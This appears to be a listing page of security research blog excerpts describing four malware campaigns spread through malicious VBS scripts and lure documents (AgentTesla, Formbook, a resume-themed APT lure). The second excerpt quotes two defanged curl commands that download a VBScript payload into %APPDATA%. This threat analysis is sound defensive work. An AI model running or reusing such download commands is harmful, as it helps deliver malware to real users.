AgentTesla Being Distributed via VBS Posted By jcleebobgatenet , October 31, 2022 The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file has multiple codes that have been obfuscated multiple times. AgentTesla has been found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing. The VBS script is distributed as an attachment to emails. Recently, emails impersonating those from Korean corporations have also been identified. The compressed file contains the VBS, and…
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) Posted By jcleebobgatenet , September 1, 2022 The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task…
APT Attack Disguised as Resume Template for North Korean Defectors (VBS Script) Posted By jcleebobgatenet , April 1, 2022 The ASEC analysis team has recently discovered that a malicious info-leaking VBS is being distributed via phishing email disguised as North Korea-related material. The email is about casting calls for a North Korea-related broadcast, and a compressed file is attached to it. It asks the readers to fill out the resume, prompting them to run the file. The compressed file contains a malicious VBS script file. The activities of ‘2022 Resume Template.vbs’ are as follows: Collects and sends information Creates…
Change in Distribution Method of Malware Disguised as Estimate (VBS Script) Posted By jcleebobgatenet , February 28, 2022 Last year, the ASEC analysis team has discovered the distribution of Formbook that used a certain company’s name in its filename. Recently, the team has discovered that it is being distributed via VBS file. The email used for distribution still contains details about a request for an estimate, and by using a certain company’s name in the attachment, it prompts the user to execute it. The compressed file attached to the email does not contain an executable but a VBS…
